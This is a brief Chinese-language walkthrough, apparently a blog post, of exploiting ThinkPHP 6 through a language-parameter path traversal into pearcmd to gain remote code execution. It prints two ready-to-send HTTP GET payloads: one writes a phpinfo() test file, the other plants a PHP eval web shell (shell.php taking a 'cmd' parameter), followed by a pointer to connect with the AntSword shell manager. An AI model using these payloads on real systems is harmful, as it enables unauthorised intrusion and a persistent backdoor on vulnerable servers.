ThinkPHP 6
1、打开页面,可以看到版本信息为6.x
2、直接bp抓包、发包测试,发送测试信息
先访问一下 /shell.php 看是否本身存在该路径
可以看到没有网页。
数据包发送payload:
GET /index.php?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php HTTP/1.1
可以看到响应码200,成功了,再访问一下shell.php
成功,存在RCE
后续可通过再次发送payload:
GET /index.php?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=@eval($_REQUEST['cmd']);?>+shell.php HTTP/1.1
使用蚁剑等连接
浙公网安备 33010602011771号